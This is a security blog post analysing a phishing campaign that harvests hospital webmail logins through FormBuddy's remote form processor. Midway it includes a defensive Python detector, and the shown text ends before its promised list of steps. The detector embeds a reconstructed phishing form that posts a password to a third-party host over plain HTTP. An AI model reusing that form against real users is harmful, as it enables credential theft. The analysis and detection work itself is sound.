Phishing For Passwords via FormBuddy.com

Most InfoSec professionals have heard of “layer 8” as the unofficial layer of the OSI Model. For those of you that don’t know, Layer 8 refers to people. Meaning, no matter how good your security posture, there is always that very predictably unpredictable and unpatchable vulnerability known as the user. It is often easier to exploit a person through social engineering than it is to find another attack vector. Take for example this spam email received by some unsuspecting end users:

The email message above looks very basic. It appears to be coming from a reliable source. The subject is “Document” and there is only one sentence in the body, “I sent a document to you, to view it click on the document below.”

For many users this would seem like a normal work email. Even if they didn’t think it was normal they might not assume it’s malicious or a phishing email.

Below you can see the URL when hovering over the “Document” text:

Clicking on that link redirects the user to the following webpage:

Scanning that URL (hxxps://dk-media.s3.amazonaws[.]com/media/1npoq/downloads/311511/share.html) via VirusTotal shows a detection ratio of 4/68 (as of 8/18/16), flagged as a “malicious” and “phishing” site. The link to that VirusTotal report can be found HERE.

Below is a snapshot of the source code showing a URL for hxxp://www.formbuddy[.]com/cgi-bin/form.pl, a method of “POST”, input values for “username” (rifart45f is the account name on FormBuddy.com), as well as a URL pointing to what appears to be a legitimate sub-domain (webmail.luriechildrens[.]org):

Using some fake credentials, I attempted to “Sign In” and was redirected to the URL shown in the source code (hxxp://www.formbuddy[.]com/cgi-bin/form.pl). Again, this was a web login page for an Outlook account.

The phishing site would appear to be targeting the legitimate web portal located at “hxxps://webmail.luriechildrens[.]org”. Luriechildrens[.]org is the site of the Ann & Robert H. Lurie Children’s Hospital in Chicago.

Scanning hxxp://www.formbuddy[.]com/cgi-bin/form.pl via VirusTotal shows a detection ratio of 3/68 (as of 8/18/16), flagged as a “malicious” and “phishing” site. The link to that VirusTotal report can be found HERE.

Predictably, I was able to capture my fake credentials via a POST request sent in the clear:
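The form described in the source-code snapshot above (a POST action pointing at a remote form processor, a hidden “username” account field, and a hidden URL pointing back at the legitimate webmail host) and the plaintext POST just captured together make a detectable pattern. The following analyzer is an added example, not code from the original post or from FormBuddy: it parses a constructed HTML page modelled on that description and flags any form that collects a password but ships it to a host other than the page’s own, over plain HTTP, or with a hidden cross-domain redirect. The page URL, the field names “redirect”, “email” and “passwd”, and the form layout are assumptions; the defanged URLs are re-armed only so that they parse, and the script never makes a network request.

```python
"""Flag login forms whose action posts credentials to a third-party host.

Added example (not from the original post). Models the phishing page
described in the write-up; sample HTML is constructed for illustration,
and the field names other than "username" are assumptions.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Constructed sample, modelled on the source shown in the post. URLs are
# re-armed from their defanged form so urlparse can read them; nothing here
# is ever fetched.
SAMPLE_PAGE_URL = "https://dk-media.s3.amazonaws.com/media/1npoq/downloads/311511/share.html"
SAMPLE_HTML = """
<html><body>
<form action="http://www.formbuddy.com/cgi-bin/form.pl" method="POST">
  <input type="hidden" name="username" value="rifart45f">
  <input type="hidden" name="redirect" value="https://webmail.luriechildrens.org">
  <input type="text" name="email">
  <input type="password" name="passwd">
  <input type="submit" value="Sign In">
</form>
</body></html>
"""


class FormCollector(HTMLParser):
    """Collect every <form> with its resolved action, method and inputs."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {
                # Resolve relative actions against the page so host checks work.
                "action": urljoin(self.page_url, a.get("action") or ""),
                "method": (a.get("method") or "GET").upper(),
                "inputs": [],
            }
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append({
                "type": (a.get("type") or "text").lower(),
                "name": a.get("name") or "",
                "value": a.get("value") or "",
            })

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def analyze_forms(page_url, html):
    """Return [(action_url, [reasons])] for every form on the page.

    A form that has no password field gets an empty reason list; one that
    does is checked for the three traits seen in the FormBuddy-style page.
    """
    parser = FormCollector(page_url)
    parser.feed(html)
    page_host = urlparse(page_url).hostname
    findings = []
    for form in parser.forms:
        reasons = []
        has_password = any(i["type"] == "password" for i in form["inputs"])
        if not has_password:
            findings.append((form["action"], reasons))
            continue
        action = urlparse(form["action"])
        # 1. Credentials leave the page's origin for a third-party processor.
        if action.hostname and action.hostname != page_host:
            reasons.append(f"password posted to third-party host {action.hostname}")
        # 2. The POST itself travels in the clear.
        if action.scheme == "http":
            reasons.append("password submitted over plaintext HTTP")
        # 3. A hidden URL value bounces the victim somewhere else afterwards.
        for i in form["inputs"]:
            if i["type"] == "hidden" and i["value"].startswith(("http://", "https://")):
                redirect_host = urlparse(i["value"]).hostname
                if redirect_host and redirect_host != action.hostname:
                    reasons.append(f"hidden field '{i['name']}' redirects to {redirect_host}")
        findings.append((form["action"], reasons))
    return findings


if __name__ == "__main__":
    for action, reasons in analyze_forms(SAMPLE_PAGE_URL, SAMPLE_HTML):
        print(("SUSPICIOUS" if reasons else "ok") + ": " + action)
        for r in reasons:
            print("  -", r)
```

The same three checks translate directly into a proxy or mail-gateway rule: any form whose action host is a known form-relay service and which carries a password field is worth a block or at least an alert, independent of whether VirusTotal has caught up with that particular URL yet.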

Trying to submit another set of credentials on hxxp://www.formbuddy[.]com/cgi-bin/form.pl doesn’t seem to do anything. I’m not finding any POST or GET request, and clicking the Sign In button doesn’t even return an error with my fake credentials.

Doing some research, I found that hackers use FormBuddy as a means to steal victims’ passwords. Essentially, FormBuddy allows anyone to have a remotely hosted form processor for their website. Here are the steps criminals use to steal passwords from their victims: